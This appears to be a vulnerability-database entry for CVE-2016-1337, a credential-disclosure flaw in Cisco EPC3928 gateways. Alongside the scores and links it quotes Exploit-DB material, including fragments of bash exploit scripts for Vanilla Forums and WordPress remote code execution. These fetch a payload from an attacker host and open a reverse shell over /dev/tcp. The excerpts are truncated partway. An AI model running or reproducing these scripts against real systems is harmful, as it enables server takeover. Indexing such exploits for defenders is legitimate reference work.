CVE-2016-1337
Published 2016-07-03
Priority P3 · 53 · high · 8.1 (CVSS 3.0)
AV:N / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 4.57% (90.4th percentile)
Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178.
CVSS provenance
nvd · v3.0 · 8.1 HIGH · CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:P/I:N/A:N
No detection rules found.
Exploit-DB
Vanilla Forums < 2.3 - Remote Code Execution
exploitdb·2017-05-11·CVSS 9.8
CVE-2016-10073 [CRITICAL] Vanilla Forums < 2.3 - Remote Code Execution
Vanilla Forums /dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# POST data string
data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
if [ $? -ne 0 ]; then
echo "[!] Failed conecting to the target URL. Exiting"
exit 2
fi
echo -e "\e[92m[+]\033[0m Connected to the target"
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
sleep 2s
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/usr/bin/nohup /bin/bash /tmp/rce"
p
Exploit-DB
WordPress Core 4.6 - Remote Code Execution
exploitdb·2017-05-03·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress Core 4.6 - Remote Code Execution
---
#!/bin/bash
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,/dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_h
Exploit-DB
Cisco EPC 3928 - Multiple Vulnerabilities
exploitdb·2016-06-07·CVSS 7.5
CVE-2016-1337 [HIGH] Cisco EPC 3928 - Multiple Vulnerabilities
---
# Title: Cisco EPC 3928 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway
# CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337
# Author: Patryk Bogdan from Secorda security team (http://secorda.com/)
Summary:
In recent security research, the Secorda security team has found multiple vulnerabilities affecting the Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected.
Using a combination of several vulnerabilities, an attacker is able to remotely download and decode the boot configuration file, which you can see in the PoC video below. The attacker is also able to reconfigure the device in order
No writeups or analysis indexed.
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/
http://www.securityfocus.com/archive/1/538627/100/0/threaded
http://www.securityfocus.com/bid/91541
https://www.exploit-db.com/exploits/39904/
Published: 2016-07-03